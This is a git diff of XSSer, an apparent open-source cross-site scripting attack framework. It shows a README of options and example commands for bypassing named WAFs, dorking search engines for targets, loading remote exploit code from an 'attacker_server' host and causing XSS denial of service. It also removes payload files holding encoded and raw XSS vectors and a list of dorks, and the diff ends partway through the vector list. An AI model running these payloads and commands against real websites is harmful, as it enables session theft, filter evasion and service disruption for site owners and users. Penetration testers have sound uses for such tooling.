+    --hash              Send a hash to check if target is repeating content
+    --heuristic         Discover parameters filtered by using heuristics
+    --discode=DISCODE   Set code on reply to discard an injection
+    --checkaturl=ALT    Check reply using: <alternative url> [aka BLIND-XSS]
+    --checkmethod=ALTM  Check reply using: GET or POST (default: GET)
+    --checkatdata=ALD   Check reply using: <alternative payload>
+    --reverse-check     Establish a reverse connection from target to XSSer
+    --reverse-open      Open a web browser when a reverse check is established
+
+  *Select Vector(s)*:
+    These options can be used to specify injection(s) code. Important if
+    you don't want to inject a common XSS vector used by default. Choose
+    only one option:
+
+    --payload=SCRIPT    OWN   - Inject your own code
+    --auto              AUTO  - Inject a list of vectors provided by XSSer
+
+  *Select Payload(s)*:
+    These options can be used to set the list of vectors provided by
+    XSSer. Choose only if required:
+
+    --auto-set=FZZ_NUM  ASET  - Limit of vectors to inject (default: 1293)
+    --auto-info         AINFO - Select ONLY vectors with INFO (defaul: FALSE)
+    --auto-random       ARAND - Set random to order (default: FALSE)
+
+  *Anti-antiXSS Firewall rules*:
+    These options can be used to try to bypass specific WAF/IDS products
+    and some anti-XSS browser filters. Choose only if required:
+
+    --Phpids0.6.5       PHPIDS (0.6.5) [ALL]
+    --Phpids0.7         PHPIDS (0.7) [ALL]
+    --Imperva           Imperva Incapsula [ALL]
+    --Webknight         WebKnight (4.1) [Chrome]
+    --F5bigip           F5 Big IP [Chrome + FF + Opera]
+    --Barracuda         Barracuda WAF [ALL]
+    --Modsec            Mod-Security [ALL]
+    --Quickdefense      QuickDefense [Chrome]
+    --Firefox           Firefox 12 [& below]
+    --Chrome            Chrome 19 & Firefox 12 [& below]
+    --Opera             Opera 10.5 [& below]
+    --Iexplorer         IExplorer 9 & Firefox 12 [& below]
+
+  *Select Bypasser(s)*:
+    These options can be used to encode vector(s) and try to bypass
+    possible anti-XSS filters. They can be combined with other techniques:
+
+    --Str               Use method String.FromCharCode()
+    --Une               Use Unescape() function
+    --Mix               Mix String.FromCharCode() and Unescape()
+    --Dec               Use Decimal encoding
+    --Hex               Use Hexadecimal encoding
+    --Hes               Use Hexadecimal encoding with semicolons
+    --Dwo               Encode IP addresses with DWORD
+    --Doo               Encode IP addresses with Octal
+    --Cem=CEM           Set different 'Character Encoding Mutations'
+                        (reversing obfuscators) (ex: 'Mix,Une,Str,Hex')
+
+  *Special Technique(s)*:
+    These options can be used to inject code using different XSS
+    techniques and fuzzing vectors. You can choose multiple:
+
+    --Coo               COO - Cross Site Scripting Cookie injection
+    --Xsa               XSA - Cross Site Agent Scripting
+    --Xsr               XSR - Cross Site Referer Scripting
+    --Dcp               DCP - Data Control Protocol injections
+    --Dom               DOM - Document Object Model injections
+    --Ind               IND - HTTP Response Splitting Induced code
+
+  *Select Final injection(s)*:
+    These options can be used to specify the final code to inject on
+    vulnerable target(s). Important if you want to exploit 'on-the-wild'
+    the vulnerabilities found. Choose only one option:
+
+    --Fp=FINALPAYLOAD   OWN    - Exploit your own code
+    --Fr=FINALREMOTE    REMOTE - Exploit a script -remotely-
+
+  *Special Final injection(s)*:
+    These options can be used to execute some 'special' injection(s) on
+    vulnerable target(s). You can select multiple and combine them with
+    your final code (except with DCP exploits):
+
+    --Anchor            ANC  - Use 'Anchor Stealth' payloader (DOM shadows!)
+    --B64               B64  - Base64 code encoding in META tag (rfc2397)
+    --Onm               ONM  - Use onMouseMove() event
+    --Ifr               IFR  - Use <iframe> source tag
+    --Dos               DOS  - XSS (client) Denial of Service
+    --Doss              DOSs - XSS (server) Denial of Service
+
+  *Reporting*:
+    --save              Export to file (XSSreport.raw)
+    --xml=FILEXML       Export to XML (--xml file.xml)
+
+  *Miscellaneous*:
+    --silent            Inhibit console output results
+    --alive=ISALIVE     Set limit of errors before check if target is alive
+    --update            Check for latest stable version
+
+================================================================
+Commands and examples:
+==============================
+
+---------------------------------------
+
+* View HELP (Available commands):
+ 
+  xsser -h (--help)
+
+----------------------------------------
+
+* Check for latest stable version:
+
+  xsser --update
+
+----------------------------------------
+
+* Launch GTK interface (GUI):
+
+  xsser --gtk
+
+----------------------------------------
+
+* Simple injection from URL:<br><br>
+
+  xsser -u "https://target.com/XSS"
+
+----------------------------------------
+
+* Simple injection from File, with Tor proxy and spoofing HTTP Referer headers
+
+  xsser -i "file.txt" --proxy "http://127.0.0.1:8118" --referer "127.0.0.1"
+
+----------------------------------------
+
+* Multiple injections from URL, with automatic payloading, establishing a reverse connection and showing statistics:
+
+  xsser -u "https:/target.com/XSS" --auto --reverse-check -s
+
+----------------------------------------
+
+* Multiple injections from URL, with automatic payloading, using Tor proxy, using "Hexadecimal" encoding, with verbose output and saving results to file (XSSreport.raw):
+
+  xsser -u "https://target.com/XSS" --auto --proxy "http://127.0.0.1:8118" --Hex --verbose --save
+
+----------------------------------------
+
+* Multiple injections from URL, with automatic payloading, using character encoding mutations (first, changing payload to 'Hexadecimal'; second, changing to 'StringFromCharCode' the first one; third, reencoding to 'Hexadecimal' the second one), with HTTP User-Agent spoofed, changing timeout to "20" and using multithreads (5 threads):
+
+  xsser -u "https://target.com/XSS" --auto --Cem "Hex,Str,Hex" --user-agent "XSSer Pentesting Tool" --timeout "20" --threads "5"
+
+----------------------------------------
+
+* Advanced injection from File, payloading your -own- code and using Unescape() character encoding to bypass filters:
+
+  xsser -i "urls.txt" --payload "<script>alert('XSSed');</script>" --Une
+
+----------------------------------------
+
+* Injection from Dork, selecting "DuckDuckGo" as search engine:
+
+  xsser --De "duck" -d "search.php?q="
+
+----------------------------------------
+
+* Injection from a list of Dorks extracted from a file (provided by XSSer) and using all search engines supported (XSSer Storm!):
+
+  xsser -l --Da 
+
+----------------------------------------
+
+* Injection from Crawler with deep 2 and 200 pages to review (XSSer Spider!):
+
+  xsser -c 200 --Cw=2 -u "https://target.com"
+
+----------------------------------------
+
+* Simple injection from URL, to a POST parameter (ex: password), with statistics results:
+
+  xsser -u "https://target.com/login.php" -p "username=admin&password=XSS" -s
+
+----------------------------------------
+
+* Multiple injections (with hex and int hashes) to multiple parameters on a single URLG and using GET:
+
+  xsser -u "https://target.com" -g "login.php?=usernameXSS&password=XSS&captcha=X1S" --auto
+
+----------------------------------------
+
+* Simple injection from URL, using GET, injecting on Cookie, trying to use DOM shadow space (no server logging!) and if exists any vulnerability, exploiting your -own- final code:
+
+  xsser -u "https://target.com" -g "/news.asp?page=XSS" --Coo --Dom --Fp="<script>alert('XSSed');</script>"
+
+----------------------------------------
+
+* Simple injection from URL, using GET and if exists any vulnerability, exploit a DoS (Denegation Of Service):
+
+  xsser -u "https://target.com" -g "/news.asp?page=XSS" --Dos
+
+----------------------------------------
+
+* Multiple injections to multiple places, extracting targets from a File, applying automatic payloading, changing timeout to "20" and using multithreads (5 threads), increasing delay between requests to 10 seconds, injecting parameters in HTTP USer-Agent, HTTP Referer and Cookies, using proxy Tor, with IP Octal obfuscation, with statistics results and using verbose mode (real player mode!): 
+
+  xsser -i "list_of_url_targets.txt" --auto --timeout "20" --threads "5" --delay "10" --Xsa --Xsr --Coo --proxy "http://127.0.0.1:8118" --Doo -s --verbose 
+
+----------------------------------------
+
+* Injection of a XSS code provided by user on a -fake- image (ready to be uploaded to your public profile):<br><br>
+
+  xsser --Imx "test.png" --payload="<script>alert('XSSed');</script>"
+
+----------------------------------------
+
+* Report dorking search (using all search engines) to a XML file:
+
+  xsser -d "login.php" --Da --xml "security_report_XSSer_Dork_login-php_allengines.xml" 
+
+----------------------------------------
+
+* Create a malicious Flash movie :
+
+  xsser --fla "INFECTED_movie.swf"
+
+----------------------------------------
+
+* Send a pre-checking hash to search for false -false positives-:
+
+  xsser -u "https://target.com" --hash
+
+----------------------------------------
+
+* Discover parameters filtered on your target using heuristics:
+
+  xsser -u "https://target.com" --heuristic
+
+----------------------------------------
+
+* Exploiting Base64 code encoding in META tag (rfc2397), just after inject a manual payload:
+ 
+  xsser -u "https://target.com" -g "/index.php?id=XSS" --payload="<script>alert('XSSed');</script>" --B64
+
+----------------------------------------
+
+* Exploiting your "own" -remote code- after discover a vulnerability using automatic fuzzing:<br><br>
+ 
+  xsser -u "https://target.com" -g "/index.php?id=XSS" --auto --Fr "https://attacker_server.net/exploits/XSS/code.js"</b><br>
+
+----------------------------------------
+
+* Apply Anti-antiXSS bypassers (ex: Imperva) before to inject you -own- code with verbose output:
+
+  xsser -u "https://target.com" -g "/index.php?id=XSS" --Imperva --payload="<script>alert('XSSed');</script>" -v
+
+----------------------------------------
+
+* Search also "XSSer" on the Internet for more videos and tutorials...
+
+  [...]
+
diff --git a/xsser/doc/requirements.txt b/doc/requirements.txt
similarity index 100%
rename from xsser/doc/requirements.txt
rename to doc/requirements.txt
diff --git a/xsser/gtk/docs/about.txt b/gtk/docs/about.txt
similarity index 85%
rename from xsser/gtk/docs/about.txt
rename to gtk/docs/about.txt
index 359cf53..4a9c485 100644
--- a/xsser/gtk/docs/about.txt
+++ b/gtk/docs/about.txt
@@ -4,7 +4,7 @@
                                                                     `.`                   ..              
             Welcome to XSSer ....                       `-:`              .-`               
                                                                         `/-     -      +`                                        
-                                                                          o     +      /                                  v1.7.2b -> ZiKA-47 Swarm!
+                                                                          o     +      /                                  v1.8[1] -> "The Hive!"
                                                                           ./   -Ny    /.                                         
                                                              `::-`       :--yMN:--.      `.....                      
                                          `mMMMMMmdhysoooosMyoo+oyhdmNMMMMMMMs       
@@ -16,7 +16,7 @@
                                                                   .::`     h`  o-  o.    :+.                       
                        GPLv3                                .--.        :o      y       :/.          
                                                                ``            h      .s         -:.        
-                                                                              :/       o.          ``                2011/2018 - by psy
+                                                                              :/       o.          ``                2010/2019 - by psy
                                                                             .o         o                   
                                                                              o          ./                  
                                                                             +`           :.                 
@@ -53,22 +53,25 @@
       Cross Site "Scripter" (aka XSSer) is an automatic -framework- to detect, exploit and report XSS vulnerabilities 
       in web-based applications.
 
-      It contains several options to try to bypass certain filters, and various special techniques of code injection.
+      It provides several options to try to bypass certain filters and various special techniques for code injection.
 
       ----------
 
-      XSSer contains 'exploits' for this browsers:
-
-        - [Chrome]: Google Chrome.
-        - [IE9.0]: Internet Explorer 9.0. 
-        - [IE8.0]: Internet Explorer 8.0.
-        - [IE7.0]: Internet Explorer 7.0. 
-        - [IE6.0]: Internet Explorer 6.0.
-        - [NS8.1-IE]: Netscape 8.1+ in IE rendering engine mode. 
-        - [NS8.1-G]: Netscape 8.1+ in the Gecko rendering engine mode.
-        - [FF]: Mozilla's Gecko rendering engine, used by Firefox/Iceweasel. 
-        - [Opera]: Opera. 
-        - [NS4]: Netscape 4.0.
+      XSSer has pre-installed [ > 1300 XSS ] attacking vectors and can bypass-exploit code on several browsers/WAFs:
+
+        - [PHPIDS]: PHP-IDS
+        - [Imperva]: Imperva Incapsula WAF
+        - [WebKnight]: WebKnight WAF
+        - [F5]: F5 Big IP WAF
+        - [Barracuda]: Barracuda WAF
+        - [ModSec]: Mod-Security
+        - [QuickDF]: QuickDefense
+        - [Chrome]: Google Chrome
+        - [IE]: Internet Explorer
+        - [FF]: Mozilla's Gecko rendering engine, used by Firefox/Iceweasel
+        - [NS-IE]: Netscape in IE rendering engine mode   
+        - [NS-G]: Netscape in the Gecko rendering engine mode
+        - [Opera]: Opera
 
     ====================================
     Documentation:
@@ -102,6 +105,7 @@
 
       You can also clone the latest development version from the XSSer repository:
 
+            $ git clone https://code.03c8.net/epsylon/xsser
             $ git clone https://github.com/epsylon/xsser
 
       For more details, check the main website: 
@@ -124,5 +128,5 @@
     Community:
     ===================
 
-      You can join #xsser community on: irc.freenode.net
+      You can FREE JOIN! #xsser community on: irc.freenode.net
 
diff --git a/gtk/docs/wizard0.txt b/gtk/docs/wizard0.txt
new file mode 100644
index 0000000..0073696
--- /dev/null
+++ b/gtk/docs/wizard0.txt
@@ -0,0 +1,16 @@
+         
+         
+          
+    ==========
+
+    Welcome to the Wizard Helper!
+
+
+    You only need to reply some questions to create your pentesting. If you haven't time to read, just press "Next". :-)
+
+    XSSer will take your answers to -automagically- build commands.
+
+
+    Press "Start Wizard" button (below) to begin with your configuration...
+
+    ==========
diff --git a/xsser/gtk/docs/wizard1.txt b/gtk/docs/wizard1.txt
similarity index 62%
rename from xsser/gtk/docs/wizard1.txt
rename to gtk/docs/wizard1.txt
index 1e983f3..4eda7c9 100644
--- a/xsser/gtk/docs/wizard1.txt
+++ b/gtk/docs/wizard1.txt
@@ -3,10 +3,10 @@
 
     ==========
 
-    OK!, so now is time to -fly your mosquito(es)-. You need to set some parameters: 
+    OK!, so now it is time to try to -fly- your mosquitoes-. For that, you need first to set some parameters: 
 
 
-        1)- I want to enter the url of my target, directly.
+        1)- I want to enter urls of my target, directly.
    
         2)- I don't know where are my targets... I just want to explore! :-)
 
diff --git a/xsser/gtk/docs/wizard2.txt b/gtk/docs/wizard2.txt
similarity index 100%
rename from xsser/gtk/docs/wizard2.txt
rename to gtk/docs/wizard2.txt
diff --git a/xsser/gtk/docs/wizard3.txt b/gtk/docs/wizard3.txt
similarity index 100%
rename from xsser/gtk/docs/wizard3.txt
rename to gtk/docs/wizard3.txt
diff --git a/xsser/gtk/docs/wizard4.txt b/gtk/docs/wizard4.txt
similarity index 100%
rename from xsser/gtk/docs/wizard4.txt
rename to gtk/docs/wizard4.txt
diff --git a/xsser/gtk/docs/wizard5.txt b/gtk/docs/wizard5.txt
similarity index 100%
rename from xsser/gtk/docs/wizard5.txt
rename to gtk/docs/wizard5.txt
diff --git a/xsser/gtk/docs/wizard6.txt b/gtk/docs/wizard6.txt
similarity index 100%
rename from xsser/gtk/docs/wizard6.txt
rename to gtk/docs/wizard6.txt
diff --git a/xsser/gtk/images/world.png b/gtk/images/world.png
similarity index 100%
rename from xsser/gtk/images/world.png
rename to gtk/images/world.png
diff --git a/xsser/gtk/images/xsser.jpg b/gtk/images/xsser.jpg
similarity index 100%
rename from xsser/gtk/images/xsser.jpg
rename to gtk/images/xsser.jpg
diff --git a/xsser/gtk/images/xssericon_16x16.png b/gtk/images/xssericon_16x16.png
similarity index 100%
rename from xsser/gtk/images/xssericon_16x16.png
rename to gtk/images/xssericon_16x16.png
diff --git a/xsser/gtk/images/xssericon_24x24.png b/gtk/images/xssericon_24x24.png
similarity index 100%
rename from xsser/gtk/images/xssericon_24x24.png
rename to gtk/images/xssericon_24x24.png
diff --git a/xsser/gtk/images/xssericon_32x32.png b/gtk/images/xssericon_32x32.png
similarity index 100%
rename from xsser/gtk/images/xssericon_32x32.png
rename to gtk/images/xssericon_32x32.png
diff --git a/xsser/gtk/xsser.desktop b/gtk/xsser.desktop
similarity index 95%
rename from xsser/gtk/xsser.desktop
rename to gtk/xsser.desktop
index 152aa23..61161bc 100644
--- a/xsser/gtk/xsser.desktop
+++ b/gtk/xsser.desktop
@@ -1,5 +1,5 @@
 [Desktop Entry]
-Version=1.1
+Version=1.8
 Type=Application
 Name=XSSer
 Comment=XSSer Framework
diff --git a/xsser/gtk/xsser.ui b/gtk/xsser.ui
old mode 100644
new mode 100755
similarity index 98%
rename from xsser/gtk/xsser.ui
rename to gtk/xsser.ui
index 599f4dc..e0c9af3
--- a/xsser/gtk/xsser.ui
+++ b/gtk/xsser.ui
@@ -13,7 +13,7 @@
     <property name="can_default">True</property>
     <property name="has_tooltip">True</property>
     <property name="border_width">1</property>
-    <property name="title" translatable="yes">XSSer v1.7b: "ZiKA-47 Swarm!" - (https://xsser.03c8.net)</property>
+    <property name="title" translatable="yes">XSSer v1.8[1]: "The Hive!" - (https://xsser.03c8.net)</property>
     <property name="window_position">center-always</property>
     <property name="destroy_with_parent">True</property>
     <property name="icon">images/xssericon_24x24.png</property>
@@ -1722,6 +1722,74 @@
                           <object class="GtkVBox" id="vbox27">
                             <property name="visible">True</property>
                             <property name="can_focus">False</property>
+      			   <child>
+                              <object class="GtkCheckButton" id="firefox">
+                                <property name="label" translatable="yes">Firefox 12</property>
+                                <property name="visible">True</property>
+                                <property name="can_focus">True</property>
+                                <property name="receives_default">False</property>
+                                <property name="tooltip_text" translatable="yes">Browser: FF</property>
+                                <property name="xalign">0</property>
+                                <property name="draw_indicator">True</property>
+                              </object>
+                              <packing>
+                                <property name="expand">True</property>
+                                <property name="fill">False</property>
+                                <property name="padding">10</property>
+                                <property name="position">4</property>
+                              </packing>
+                            </child>
+                            <child>
+                              <object class="GtkCheckButton" id="chrome">
+                                <property name="label" translatable="yes">Chrome 19 &amp; Firefox 12</property>
+                                <property name="visible">True</property>
+                                <property name="can_focus">True</property>
+                                <property name="receives_default">False</property>
+                                <property name="tooltip_text" translatable="yes">Browser: Chrome + FF</property>
+                                <property name="xalign">0</property>
+                                <property name="draw_indicator">True</property>
+                              </object>
+                              <packing>
+                                <property name="expand">True</property>
+                                <property name="fill">False</property>
+                                <property name="padding">10</property>
+                                <property name="position">4</property>
+                              </packing>
+                            </child>
+                            <child>
+                              <object class="GtkCheckButton" id="iexplorer">
+                                <property name="label" translatable="yes">Internet Explorer 9</property>
+                                <property name="visible">True</property>
+                                <property name="can_focus">True</property>
+                                <property name="receives_default">False</property>
+                                <property name="tooltip_text" translatable="yes">Browser: IE</property>
+                                <property name="xalign">0</property>
+                                <property name="draw_indicator">True</property>
+                              </object>
+                              <packing>
+                                <property name="expand">True</property>
+                                <property name="fill">False</property>
+                                <property name="padding">10</property>
+                                <property name="position">4</property>
+                              </packing>
+                            </child>
+                            <child>
+                              <object class="GtkCheckButton" id="opera">
+                                <property name="label" translatable="yes">Opera 10.5 &amp; IE 6</property>
+                                <property name="visible">True</property>
+                                <property name="can_focus">True</property>
+                                <property name="receives_default">False</property>
+                                <property name="tooltip_text" translatable="yes">Browser: Opera + IE</property>
+                                <property name="xalign">0</property>
+                                <property name="draw_indicator">True</property>
+                              </object>
+                              <packing>
+                                <property name="expand">True</property>
+                                <property name="fill">False</property>
+                                <property name="padding">10</property>
+                                <property name="position">4</property>
+                              </packing>
+                            </child>
                             <child>
                               <object class="GtkCheckButton" id="phpids">
                                 <property name="label" translatable="yes">PHPIDS (&lt;0.6.5)</property>
diff --git a/xsser/setup.py b/setup.py
similarity index 92%
rename from xsser/setup.py
rename to setup.py
index f5dd9f2..471f07f 100644
--- a/xsser/setup.py
+++ b/setup.py
@@ -2,11 +2,9 @@
 # -*- coding: utf-8 -*-"
 # vim: set expandtab tabstop=4 shiftwidth=4:
 """
-$Id$
+This file is part of the XSSer project, https://xsser.03c8.net
 
-This file is part of the xsser project, https://xsser.03c8.net
-
-Copyright (c) 2011/2018 psy <epsylon@riseup.net>
+Copyright (c) 2010/2019 | psy <epsylon@riseup.net>
 
 xsser is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free
@@ -23,9 +21,7 @@
 """
 from setuptools import setup
 import os
-
 data_files = []
-
 image_files = []
 doc_files = []
 gtk_doc_files = []
@@ -35,16 +31,14 @@
 for afile in os.listdir('gtk/docs'):
     if afile != '.svn':
         gtk_doc_files.append('gtk/docs/' + afile)
-
 data_files = ['gtk/images/world.png', 'gtk/images/xsser.jpg',
               'gtk/images/xssericon_16x16.png',
               'gtk/images/xssericon_24x24.png']
 gtk_files = ['gtk/xsser.ui']
 gtk_app_files = ['gtk/xsser.desktop']
-
 setup(
     name = "xsser",
-    version = "1.7",
+    version = "1.8",
     packages = ['core', 'core.fuzzing', 'core.post'],
     data_files = [('/usr/share/doc/xsser/', doc_files), 
                   ('/usr/share/xsser/gtk/images/', data_files),
diff --git a/xsser/xsser b/xsser
similarity index 89%
rename from xsser/xsser
rename to xsser
index a989f1c..9addd83 100755
--- a/xsser/xsser
+++ b/xsser
@@ -2,11 +2,9 @@
 # -*- coding: utf-8 -*-"
 # vim: set expandtab tabstop=4 shiftwidth=4:
 """
-$Id$
+This file is part of the XSSer project, https://xsser.03c8.net
 
-This file is part of the xsser project, https://xsser.03c8.net
-
-Copyright (c) 2011/2018 psy <epsylon@riseup.net>
+Copyright (c) 2010/2019 | psy <epsylon@riseup.net>
 
 xsser is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free
diff --git a/xsser/core/fuzzing/DCP.py b/xsser/core/fuzzing/DCP.py
deleted file mode 100644
index 06fdf8b..0000000
--- a/xsser/core/fuzzing/DCP.py
+++ /dev/null
@@ -1,55 +0,0 @@
-#!/usr/bin/env python
-# -*- coding: utf-8 -*-"
-# vim: set expandtab tabstop=4 shiftwidth=4:
-"""
-$Id$
-
-This file is part of the xsser project, http://xsser.03c8.net
-
-Copyright (c) 2011/2016 psy <epsylon@riseup.net>
-
-xsser is free software; you can redistribute it and/or modify it under
-the terms of the GNU General Public License as published by the Free
-Software Foundation version 3 of the License.
-
-xsser is distributed in the hope that it will be useful, but WITHOUT ANY
-WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
-FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
-details.
-
-You should have received a copy of the GNU General Public License along
-with xsser; if not, write to the Free Software Foundation, Inc., 51
-Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
-"""
-## This file contains different XSS fuzzing vectors.
-## If you have some new, please email me to [epsylon@riseup.net]
-## Happy Cross Hacking! ;)
-
-DCPvectors = [
-		{ 'payload' : """<a href="data:text/html;base64,JTNjc2NyaXB0JTNlYWxlcnQoIlhTUyIpO2hpc3RvcnkuYmFjaygpOyUzYy9zY3JpcHQlM2UiPjwv YT4=""",
-                  'browser' : """[Data Control Protocol Injection]""" },
-
-		{ 'payload' : """<iframe src="data:text/html;base64,JTNjc2NyaXB0JTNlYWxlcnQoIlhTUyIpO2hpc3RvcnkuYmFjaygpOyUzYy9zY3JpcHQlM2UiPjwv""",
-		  'browser' : """[Data Control Protocol Injection]"""},	
-	
-		#{ 'payload' : """data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik7aGlzdG9yeS5iYWNrKCk7PC9zY3JpcHQ+""",
-                #  'browser' : """[Data Control Protocol Injection]"""},
-
-		#{ 'payload' : """data:text/html;base64,K0FEdy1zY3JpcHQrQUQ0LWFsZXJ0KCJYU1MiKStBRHMtaGlzdG9yeS5iYWNrKCkrQURzQVBBLS9z-""",
-		#  'browser' : """[Data Control Protocol Injection]""" },
-
-		#{ 'payload' : """data:text/html;base64,LCtBRHdBY3dCakFISUFhUUJ3QUhRQVBnKy1hbGVydCgiWFNTIik7aGlzdG9yeS5iYWNrKCkrQURz""",
-                #  'browser' : """[Data Control Protocol Injection]""" },
-
-		#{ 'payload' : """data:text/html;base64,K0FEd0Fjd0JqQUhJQWFRQndBSFFBUGdCaEFHd0FaUUJ5QUhRQUtBQXhBQ2tBT3dCb0FHa0Fjd0Iw""",
-                #  'browser' : """[Data Control Protocol Injection]""" },
-
-		#{ 'payload' : """data:text/html;base64,K0FEdy1zY3JpcHQrQUQ0LWFsZXJ0KFhTUykrQURzLWhpc3RvcnkuYmFjaygpK0FEc0FQQS0vc2Ny aXB0K0FENC0=""",
-                #  'browser' : """[Data Control Protocol Injection]""" },
-
-		{ 'payload' : """0?<script>Worker("#").onmessage=function(_)eval(_.data)</script> :postMessage(importScripts('data:;base64,PHNjcmlwdD5hbGVydCgiWFNTIik7aGlzdG9yeS5iYWNrKCk7PC9zY3JpcHQ+'))""",
-		  'browser' : """[Data Control Protocol Injection]"""},
-
-		{ 'payload' : """data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAwIiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlhTUyIpOzwvc2NyaXB0Pjwvc3ZnPg==""",
-                  'browser' : """[Data Control Protocol Injection]""" }
-		]
diff --git a/xsser/core/fuzzing/dorks.txt b/xsser/core/fuzzing/dorks.txt
deleted file mode 100644
index 68befea..0000000
--- a/xsser/core/fuzzing/dorks.txt
+++ /dev/null
@@ -1,30 +0,0 @@
-.php?cmd=
-.php?z=
-.php?q=
-.php?search=
-.php?query=
-.php?searchst­ring=
-.php?keyword=­
-.php?file=
-.php?years=
-.php?txt=
-.php?tag=
-.php?max=
-.php?from=
-.php?author=
-.php?pass=
-.php?feedback­=
-.php?mail=
-.php?cat=
-.php?vote=
-search.php?q=
-headersearch.p­hp?sid=
-/news.php?id=
-/search_results.php?search=
-/notice.php?msg= 
-/view.php?PID= 
-/search.php?search_keywords=
-/contentPage.php?id= 
-/main.php?sid=
-/feedpost.php?url=
-/poll/­default.asp?catid=
diff --git a/xsser/core/fuzzing/vectors.py b/xsser/core/fuzzing/vectors.py
deleted file mode 100644
index d015fde..0000000
--- a/xsser/core/fuzzing/vectors.py
+++ /dev/null
@@ -1,1145 +0,0 @@
-#!/usr/bin/env python
-# -*- coding: utf-8 -*-"
-# vim: set expandtab tabstop=4 shiftwidth=4:
-"""
-$Id$
-
-This file is part of the xsser project, http://xsser.03c8.net
-
-Copyright (c) 2011/2016 psy <epsylon@riseup.net>
-
-xsser is free software; you can redistribute it and/or modify it under
-the terms of the GNU General Public License as published by the Free
-Software Foundation version 3 of the License.
-
-xsser is distributed in the hope that it will be useful, but WITHOUT ANY
-WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
-FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
-details.
-
-You should have received a copy of the GNU General Public License along
-with xsser; if not, write to the Free Software Foundation, Inc., 51
-Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
-"""
-## This file contains different XSS fuzzing vectors.
-## If you have some new, please email me to [epsylon@riseup.net]
-## Happy Cross Hacking! ;)
-
-vectors = [	{ 'payload':'''">PAYLOAD''',
-		  'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]"""},
-        { 'payload':""""><SCRIPT>alert('PAYLOAD')</SCRIPT>""",
-          'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]"""},	
-        { 'payload':"""</TITLE>PAYLOAD""",
-	      'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]"""},
-		{ 'payload':""""><img src="x:x" onerror="PAYLOAD">""",
-		  'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]"""},		
-		{ 'payload':"""<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=PAYLOAD>""",
-		  'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]"""},
-		{ 'payload':"""'';!--"<PAYLOAD>=&{()}" """,
-		  'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]"""},	
-		{ 'payload':"""<IMG SRC="PAYLOAD">""",
-		  'browser':"""[IE6.0|NS8.1-IE] [O9.02]"""},
-		{ 'payload':"""<IMG SRC=PAYLOAD>""",
-  		  'browser':"""[IE6.0|NS8.1-IE] [O9.02]"""},
-		{ 'payload':"""<IMG SRC=`PAYLOAD`>""",
-		  'browser':"""[IE6.0|NS8.1-IE]"""},
-		{ 'payload':'''<IMG """>PAYLOAD">''',
-		  'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]"""},
-		{ 'payload':"""<IMG SRC=" &#14;  PAYLOAD">""",
-	      'browser':"""[IE6.0|NS8.1-IE]"""},
-		{ 'payload':"""<DIV STYLE="behaviour: url(PAYLOAD);">""",
-		  'browser':"""[IE6.0|NS8.1-IE]"""},
-        { 'payload':"""<<SCRIPT>PAYLOAD//<</SCRIPT>""",
-		  'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]"""},
-		{ 'payload':"""\";PAYLOAD//""",
-		  'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]"""},
-		{ 'payload':"""<IMG SRC='PAYLOAD'""",
-		  'browser':"""[IE6.0|NS8.1-IE] [O9.02]"""},
-		{ 'payload':"""<BODY BACKGROUND="PAYLOAD">""",
-		  'browser':"""[IE6.0|NS8.1-IE] [O9.02]"""},
-		{ 'payload':"""<INPUT TYPE="IMAGE" SRC="PAYLOAD">""",
-		  'browser':"""[IE6.0|NS8.1-IE] [O9.02]"""},
-        { 'payload':"""<BODY ONLOAD=PAYLOAD>""",
-	      'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]"""},
-		{ 'payload':"""<IMG DYNSRC="PAYLOAD">""",
-		  'browser':"""[IE6.0|NS8.1-IE]"""},
-		{ 'payload':"""<IMG LOWSRC="PAYLOAD">""",
-		  'browser':"""[IE6.0|NS8.1-IE]"""},
-		{ 'payload':"""<BGSOUND SRC="PAYLOAD">""",
-	      'browser':"""[O9.02]"""},
-        { 'payload':"""<BR SIZE="&{PAYLOAD}">""",
-		  'browser':"""[NS4]"""},
-		{ 'payload':"""<LINK REL="stylesheet" HREF="PAYLOAD">""",
-		  'browser':"""[IE6.0|NS8.1-IE] [O9.02]"""},
-		{ 'payload':"""<IMG SRC='vbscript:PAYLOAD'>""",
-	   	  'browser':"""[IE6.0|NS8.1-IE]"""},
-		{ 'payload':"""<IMG SRC="mocha:[PAYLOAD]">""",
-	   	  'browser':"""[NS4]"""},
-	 	{ 'payload':"""<IMG SRC="livescript:[PAYLOAD]">""",
-	  	  'browser':"""[NS4]"""},
-	 	{ 'payload':"""<META HTTP-EQUIV="refresh" CONTENT="0;url=PAYLOAD">""",
